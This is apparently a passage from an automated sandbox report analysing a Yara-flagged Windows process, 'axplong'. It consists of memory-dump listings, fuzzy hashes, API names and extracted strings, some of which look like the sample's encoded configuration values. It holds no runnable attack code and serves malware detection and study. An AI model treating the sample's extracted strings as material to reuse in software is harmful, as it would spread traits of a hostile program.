                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8ae346fa98e69504ed8ed58e2ac6a015785bd33f0abdc7c0ca4aceefad69e2ae
                      • Instruction ID: f2a5a935bccb01079ccb1d89fb6763241173416b6279508e92bbf06501f1dae6
                      • Opcode Fuzzy Hash: 8ae346fa98e69504ed8ed58e2ac6a015785bd33f0abdc7c0ca4aceefad69e2ae
                      • Instruction Fuzzy Hash: 58F0F9EB4BC000FF9602CB915A9C4B97E27BD963303318426F88755402F2E1861C99E4
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c3b7b5ad6108adff91d0c77a9c7da838a9a037df77689eb381dba5710a438e39
                      • Instruction ID: 95ba76bb052059300df041e6826835e9e1f1511e46e8ea87fae86d4c4a7f4d37
                      • Opcode Fuzzy Hash: c3b7b5ad6108adff91d0c77a9c7da838a9a037df77689eb381dba5710a438e39
                      • Instruction Fuzzy Hash: 2AF0F6B74BC000EF8602DB816E8C9797627BE96330335806AE8875A002E6F1461C9EF9
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 66d0b9b1516581dfb62a4252ef3fc6f2212e23cc27dbfd945d766c628c1f5a62
                      • Instruction ID: 67e2822c75ac0b0d6ee958a8f39be6afbff856c0aa08379453d8a1ff3efa9972
                      • Opcode Fuzzy Hash: 66d0b9b1516581dfb62a4252ef3fc6f2212e23cc27dbfd945d766c628c1f5a62
                      • Instruction Fuzzy Hash: 31F0BBA74BC010FF5606DB81598C9B57A27BE5A3307318026F88759412E2E5475C99E9
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 71f002c36a8f9dfba89e28a61ddb70a5979584df84543e0198924dc590979d46
                      • Instruction ID: 70871161f38bcc37d370ecb6a98a3c94920d7d5ad726ad14e88c09af506e31e0
                      • Opcode Fuzzy Hash: 71f002c36a8f9dfba89e28a61ddb70a5979584df84543e0198924dc590979d46
                      • Instruction Fuzzy Hash: 07F0E9D70BC010AF8545C6912A9C576766BBD96330331816BF8C355002E5D14B0D95B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
                      • API String ID: 0-214772295
                      • Opcode ID: 99a9b43cbd232d669571861cef73885b75f07d080c8fd86fd62549143efb0eed
                      • Instruction ID: 96a5f09c53febe514284ed1cb6a2b16cada5ad03b982db90e986d92a0ec20ebd
                      • Opcode Fuzzy Hash: 99a9b43cbd232d669571861cef73885b75f07d080c8fd86fd62549143efb0eed
                      • Instruction Fuzzy Hash: 3A82C07090424C9BEF14EF68C9497DE7FB6FB46304F508198E805A73C2D7799A88CB92
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: fa9ee4af209fd5c771e39797a48eb7f87155296ea7a6368d98136568259225fa
                      • Instruction ID: a346c314a414d91f42863eb879ebabb790e1ab723ffe1c4eae0a2cde48b5e5ce
                      • Opcode Fuzzy Hash: fa9ee4af209fd5c771e39797a48eb7f87155296ea7a6368d98136568259225fa
                      • Instruction Fuzzy Hash: 7AC24B71E086688FDB25CE29DD447E9B3B5FB8A314F1441EAD84EE7240E774AE818F41
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction ID: 2d03bfc9a61781cc43aedfaedc5b88c941baf2028cb9084eadb3b44da07315ff
                      • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction Fuzzy Hash: 82F16F71E002599FDF14CFA9C8806AEB7B5FF89314F258269E919EB345D730AE01CB90
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,008BCE82,?,?,?,?,008BCEB7,?,?,?,?,?,?,008BC42D,?,00000001), ref: 008BCB33
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: c90778a775cf564e068909fcbf1e0b2e1e49801ad206d91e15532a3f8a0c64e9
                      • Instruction ID: 256037ced2c7933b9d0487d4b8fda530265b9cd8350c330bc4cfff8d1ca20c1b
                      • Opcode Fuzzy Hash: c90778a775cf564e068909fcbf1e0b2e1e49801ad206d91e15532a3f8a0c64e9
                      • Instruction Fuzzy Hash: F2D01232A9753C9BCA122BA4BC09CEDBB19FF45B743454111ED05A72208A616C419FE5
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: 2cfd25ab588579a5e4fad753a9caeb66784b0edfc9675847ee33aa5bd8c21ea4
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: D951357020C7489ADB389A2C88967BEA79BFF51708F18076BD482D7782FA11DD458392
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4a19b0785404768001ca1441a23d4f10b17b7073fb3e5ca9bc335ffe8d499310
                      • Instruction ID: f0a0d31d96b37a7f8850103a4ce83e99d876556fff9f08e5a0f6a84302da4819
                      • Opcode Fuzzy Hash: 4a19b0785404768001ca1441a23d4f10b17b7073fb3e5ca9bc335ffe8d499310
                      • Instruction Fuzzy Hash: F8225FB3F515144BDB0CCA9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9159A44
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dc225a63af5d62e998209e03364c278f159bac1d299d08fbe08f83f70692d8bc
                      • Instruction ID: 90a97358d91192b947c9b3f6f58fe27c5309e0b80109f654aaa87d173ad20821
                      • Opcode Fuzzy Hash: dc225a63af5d62e998209e03364c278f159bac1d299d08fbe08f83f70692d8bc
                      • Instruction Fuzzy Hash: A0B18B31214649CFD719CF29C486B657BE0FF46364F298658E89ACF2A1C736E992CB40
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 738f397fd31e5b2ba27f4530648541c7191a35ab890a881f739cef5653ad4c2b
                      • Instruction ID: 8858ad13c6370f04476b89768506f37992b4a43900bfc2620a01d3d093f0be04
                      • Opcode Fuzzy Hash: 738f397fd31e5b2ba27f4530648541c7191a35ab890a881f739cef5653ad4c2b
                      • Instruction Fuzzy Hash: D261BDB3F6022547F3544D29CC983A27683DB95310F2F82788E5CAB7C5D97E5D0A5384
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 008A247E
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID:
                      • API String ID: 2659868963-0
                      • Opcode ID: 0ed53b1a8c228fc860d4c541f0e4a02cfd3b73b019799eb2d08dcf819b352178
                      • Instruction ID: 214aa40bcdd6bc5ee4de6de7e42b9af44593acdda0b1a2591c75db2582c0ca10
                      • Opcode Fuzzy Hash: 0ed53b1a8c228fc860d4c541f0e4a02cfd3b73b019799eb2d08dcf819b352178
                      • Instruction Fuzzy Hash: D95189B2A1470AAFDB15CF68D8856AABBF0FB08310F24866AD444EB351E7359940DF50
                      Strings
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                      • API String ID: 0-2390467879
                      • Opcode ID: fe0c9c733527c214db28343d45a426324f1e54a86afdd22004a0a473af45ba8b
                      • Instruction ID: 28f08975d07059037fa07c63a2f5f80012e67b682f74ac7c6389d1f95fd52c8a
                      • Opcode Fuzzy Hash: fe0c9c733527c214db28343d45a426324f1e54a86afdd22004a0a473af45ba8b
                      • Instruction Fuzzy Hash: 6C028C70A00248EFEF14EFA8C859BDEBBB5FF45304F504559E805A7382D7759A84CBA2
                      APIs
                      Strings
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 103f607900e454442bf64c0f4fd8bb58ee9a39238460a0f502b2e2fa25345fc7
                      • Instruction ID: 515a262c66b51ffdf8f6733f96aff83b0f3fb86a89d06a6d55a910d6c8683cb7
                      • Opcode Fuzzy Hash: 103f607900e454442bf64c0f4fd8bb58ee9a39238460a0f502b2e2fa25345fc7
                      • Instruction Fuzzy Hash: 3A014E37608656321A18242D9C0263B2798FB82FB4726032BFE54F73C2FF44DC0281A1
                      APIs
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$Cnd_broadcast
                      • String ID:
                      • API String ID: 32384418-0
                      • Opcode ID: 498b3f195378974298380e79717cfaeecb27177a17fe0005ea007d878589649d
                      • Instruction ID: 3d8b70c8962ec873e54bfd7b2fdee9cf86bc193617ad41a775f75a94272c8c9c
                      • Opcode Fuzzy Hash: 498b3f195378974298380e79717cfaeecb27177a17fe0005ea007d878589649d
                      • Instruction Fuzzy Hash: 95A1C0B0A017059FEB21DF68C945BAAB7B8FF16314F048129F815D7B41EB75EA04CB92
                      APIs
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: a31ede98ce63163abafa49e1b3f8f6800ae5c0d80857d17a549f405c852be3aa
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 63B1467291029B9FDB11CF28C881BAEBBE5FF55310F1482ABE949EB341D6348D41CB61
                      APIs
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 5281f4d82f1dd3f79303d55b05d274a3657765315542aae444a8d3bc8aaa8e16
                      • Instruction ID: b5511c2f85c724272e5ef9bf7c9eca009b63694108b7c61f9090460f5e16ef00
                      • Opcode Fuzzy Hash: 5281f4d82f1dd3f79303d55b05d274a3657765315542aae444a8d3bc8aaa8e16
                      • Instruction Fuzzy Hash: 1321FB71A012199FDF11EFA8D8859EEBBB8FF48714F104065F501E7351DB70AD019BA2